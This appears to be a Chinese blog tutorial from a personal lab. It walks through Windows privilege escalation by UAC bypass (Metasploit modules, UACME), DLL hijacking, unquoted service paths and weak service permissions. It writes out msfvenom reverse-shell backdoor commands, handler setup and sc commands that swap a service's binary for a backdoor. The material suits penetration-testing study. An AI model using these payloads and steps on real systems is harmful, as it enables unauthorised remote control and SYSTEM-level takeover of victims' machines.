windows提权之BypassUAC&DLL劫持&引号路径&服务权限提权

最新推荐文章于 2024-04-10 13:53:58 发布
最新推荐文章于 2024-04-10 13:53:58 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: windows+linux提权 文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129694575
版权

0x01 bypassuac提权

UAC是一个账户访问控制,运行一些程序时,会提醒是否运行这个程序

一.msf绕过uac

环境:win10,win7 管理员用户组的用户

#生成木马
msfvenom -p windows/meterpreter/reverse_tcp lport=4444 lhost=192.168.85.129 -f exe -o 11.exe 
开启监听
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
run

msf成功上线,可以使用msf的自动化提权

getsystem #会尝试一些基本提权方法进行提权,如令牌窃取,进程注入等

可以看到getsystem失败了,可以使用msf的模块进行绕过uac的检测

win7:

use exploit/windows/local/bypassuac
set session 1
getuid
getsystem
getuid

成功提权:

UAC设置有三个等级:低,中,高,默认为中

当设置为高级时:

exploit/windows/local/bypassuac不好用了,提权不了

use exploit/windows/local/ask   #需要用户点击才可以
set session 1
run
getuid
getsystem
getuid

用户点击才可以提权

win10:

#这三个模块都可以win7不可用
use exploit/windows/local/ask
use exploit/windows/local/bypassuac_sluihijack
use exploit/windows/local/bypassuac_silentcleanup
#使用第二个模块
use exploit/windows/local/bypassuac_sluihijack
set session 1
run
getuid
getsystem
getuid

刚开始getsystem失败

msf共有十几个uac模块,灵活应用

bypassuac注意需要用户在管理员组,并且uac是开启状态,uac如果是关闭状态是可以直接getsystem进行提权的

二.工具uac绕过

工具:uacme

环境:win7

uac为默认,中等级,高等级需要点击才能够执行

uacme有70多种绕过方法,比较好用的几种41,23,61

Akagi64.exe  #会弹出一个cmd窗口,权限高
Akagi64.exe 41 位置+111.exe #以高权限调用后门
Akagi64.exe 第几个方法 执行的东西

0x02 dll劫持提权

windows程序启动的时候需要dll,可以通过把后门写成dll文件覆盖原有的dll文件,等待管理员点击进行提权。dll文件的搜寻顺序

1、应用程序加载的目录

2、C:\Windows\System32

3、C:\Windows\System

4、C:\Windows

5、当前工作目录Current Working Directory,CWD

6、在PATH环境变量的目录(先系统后用户)

一般dll劫持的是在应用程序的加载目录,其他地方可能没有权限

环境:win2016 flashfxp(ftp)

1.信息搜集(应用程序调用的dll文件,一般是分析程序启动目录)

2.创建dll后门

3.上传并覆盖

4.等待应用执行

分析工具:

火绒剑,ChkDllHijack

火绒剑使用:

ChkDllHijack使用:

成功:

失败(不可dll劫持):

msf生成dll文件:

 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.85.129 lport=3344 -f dll -o 1.dll
开启监听
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lpor 3344
run

上传重命名覆盖,执行flashfxp,成功上线

0x03引号路径提权

当服务是没有引号又有空格是就会造成提权,系统会把空格前的当作exe程序,把后面的当作参数,可以生成一个和前面名字一样的后门exe,当服务启动时,会成功上线,如果是系统服务,那获得的就是system权限;当有引号担忧空格时,就会当作一个整体,没有安全问题

环境:win2016+macro_expert_enterprise-win服务

检测命令:

排除c盘的windows主要是因为没有权限

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

检测工具:

ps脚本 jaws

msf生成和服务空格前一样的exe后门程序,放到对应启动的位置,放到C盘

 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.85.129 lport=4444 -f exe -o Program.exe
开启监听
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
run

先关闭服务:

sc stop "Macro Expert"

后重启服务

sc start "Macro Expert"

成功上线:

0x04 服务权限提权

对权限控制不到位,导致用户可以更改服务执行的程序

正常来说是改不了的

环境:win2016

检测工具:

jaws ps脚本

accesschk :

accesschk.exe -uwcqv "administrators" *

找可以改的service_all_access

创建一个服务:

sc create test start= auto binPath="C:\1.exe"

msf生成和服务空格前一样的exe后门程序,放到对应启动的位置,放到C盘

 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.85.129 lport=4444 -f exe -o Program.exe
开启监听
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
run

更改服务程序路径,并启动服务

sc config "test" binpath="C:\Program.exe"
sc start test

成功上线并提权,这里很快就关闭了,可能是因为自己创建的服务,如果是系统的,应该就不会掉线了

mushangqiujin
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DccwBypassUAC:Windows 8.1和10 UAC绕过“ dccw.exe”中的WinSxS
02-06
DccwBypassUAC:Windows 8.1和10 UAC绕过“ dccw.exe”中的WinSxS
bypassuac:绕过uac
05-13
bypassuac ###example: bypassuac.exe "/c echo 1 >> c:\\3333" bypassuac.exe "/c powershell -c "aaaa" bypassuac,exe system ###题外话: 只能编译成32位. 多重指针写起来太麻烦,所以patch peb用内嵌汇编写的. 想编译成x64的话得改改代码. 参考了老外的项目: patch peb后,然后调用IFileOperation对象的某个接口的shellexecute函数,原因在老外的文章里写了. 具体细节看代码吧. 适用于Win7-Win10 加了一段getsystem的代码,原理跟msf里的getsystem一样.
Windows权限升—BypassUAC、DLL劫持,2024年最新2024BAT大厂网络安全社招面试题
最新发布
2401_84185145的博客
04-10 416
关于Windows应该这篇总结完就结束了,再次醒一下关于第三方软件或插件,不是不写,而且有些软件都会自动更新,很多漏洞基本上很少遇到,同时也利用不了,比如说:向日葵有一个版本能够,但是现在那个版本装再电脑上,根本连接不上向日葵的服务器,更何谈呢,同时还可以看日志,目前日志也更改了,端口不会再日志中出现了。前面几篇文章我就汇总在下面了,同时关于UAC权之前一篇文章写的没那么细,这里重新补充一下。Windows权限升—令牌窃取、UAC、进程注入等
第62天:权限升-烂土豆&dll劫持&引号路径&服务权限1
08-03
1、应用程序加载的目录 5、当前工作目录 Current Working Directory,CWD 6、在 PATH 环境变量的目录(先系统后用户)
dll注入工具_bypassUAC && DLL劫持
weixin_39673303的博客
11-29 938
0x11 UAC简介用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。UAC需要授的动作包括:1.配置Windows Update2.增加或删除用户账户3.改变用户...
BypassUAC------BypassUac On Win10 Using Disk Cleanup
moonhillcity的博客
10-20 1611
最近看到enigma0x3博客上分享了一种通过Disk Cleanup计划任务进行bypassuac的姿势,感觉还是不错的,所以在这儿分享一下。原文在这里 戳我 关于BypassUAC工具已经很多了,有个非常不错的工具 UACME 简单的说一下通过Disk Cleanup进行bypassuac的原理。 Win10有一个计划任务叫做SilentCleanup,具体位置在\Microsoft\W
通过Bypass UAC进行权限
yy
01-30 3375
用户账户控制(User Account control,UAC)是windows系统采用的一种控制机制,可以阻止自动安装未经授的应用 并防止意外更改系统设置,有助于防止恶意软件损坏计算机。用户账户控制程序使应用程序和任务始终在非管理员账户的安全上下文中运行,除非管理员专门授管理员级别的权限。开启用户账户控制后,每个需要使用管理员访问令牌的应用都必须征得用户同意。UAC限制所有用户包括非RID500的管理员用户使用标准用户登录到他们的计算机,并在标准用户的安全性上下文中访问资源和运行应用。
权限升-Windows】-UAC权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限
xiaoheizi的博客
09-01 1940
1、具体有哪些权限需要我们了解掌握的?后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等2、以上常见权限获取方法简要归类说明?后台权限:SQL注入数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限:SQL注入数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入。
windows之UAC
p_utao的博客
11-15 1801
前期准备 目标机 攻击机 win7 kali 192.168.43.254 192.168.43.113 我这里,只演示攻击过程,如果有不懂的命令可以去看看我其他的文章有专门我做命令的笔记或者自行去百度。 UAC简介 UAC(User Account Control,用户帐户控制)是微软为高系统安全而在Windows Vista中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,权限或管理员‌密码。 也就是说一旦用户允许启动的应用程
Windows权限升—令牌窃取、UAC、进程注入等
剁椒鱼头没剁椒的博客
03-27 3630
在之前的文章中已经对Windows权限升进行了介绍,这里同样不再赘述,如果想要去了解Windows权限升可以看以下的文章,同时也将Windows权限升其它的几种办法也放在下面的文章中。同时本来应该还写一篇第三方全家的,但是在实际测试过程中发现,有些第三方,如果在电脑上都会自动更新,比如向日葵,低版本的直接无法连接向日葵官方的服务器,那么个毛权限的啊。Windows权限升—溢出Windows权限升—MySQL数据库
Windows本地 · 下篇
qq_61553520的博客
05-31 1041
Windows本地,这种适用于有一本地个用户的基础上,有一定的权限,无法从webshell上进行
udf_udf_udf.dll下载_mysql_ballsv6__源码
10-04
mysql,udf所需要的dll文件,有64位和32位
mysql数据库所需lib_mysqludf_sys_64.dll(64位)
10-03
必备,之后会出对应的教程
lpk.rar_delphi _
09-21
delphi lpk.dll源码 自动添加aa aa的管理员帐号.专用
155.网络安全渗透测试—[Cobalt Strike系列]—[权限升/BypassUAC/MS14-058/PowerUp/MSF]
qwsn
03-28 892
一、权限升 1、BypassUAC 2、CVE-2014-4113(MS14-058) 3、powerup 服务权限配置不当 4、MSF 利用服务权限配置不当模块 二、测试 1、实验环境 2、BypassUAC 2、MS14-058 3、powerup服务配置不当
Windows权限升—BypassUAC、DLL劫持引号路径服务权限
剁椒鱼头没剁椒的博客
03-29 1631
关于Windows应该这篇总结完就结束了,再次醒一下关于第三方软件或插件,不是不写,而且有些软件都会自动更新,很多漏洞基本上很少遇到,同时也利用不了,比如说:向日葵有一个版本能够,但是现在那个版本装再电脑上,根本连接不上向日葵的服务器,更何谈呢,同时还可以看日志,目前日志也更改了,端口不会再日志中出现了。前面几篇文章我就汇总在下面了,同时关于UAC权之前一篇文章写的没那么细,这里重新补充一下。Windows权限升—令牌窃取、UAC、进程注入等
Windows&BypassUAC&Dll劫持
weixin_39953838的博客
01-17 858
一个姑娘,如果有被人喜欢,而且那个人喜欢的干干净净,怎么都是一件好事!
BypassUAC方式总结
Kevin's Blog
11-09 5442
文章目录一、利用场景/需求1.1 UAC介绍1.2 目的绕过二、MSF之bypassuac模块2.1 bypassuac_eventvwr模块 一、利用场景/需求 1.1 UAC介绍 UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授当前可执行文件来达到阻止恶意程序的目的。 1.2 目的绕过 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行弹窗直接运行执行文件) 具体的场景可
Bypass UAC(用户账户控制)的几种方法探究及案例
Web_boom的博客
08-01 767
这篇文章可以带大家了解UAC认证机制和如何Bypass UAC。
CTF windows
09-06
4. DLL劫持:通过在系统中替换可执行文件所需要的动态链接库(DLL),使得恶意DLL被加载并执行,从而进行。 5. 特升级:在系统中寻找已经拥有一定权限的进程,然后通过一些方法升这些进程的权限,比如利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值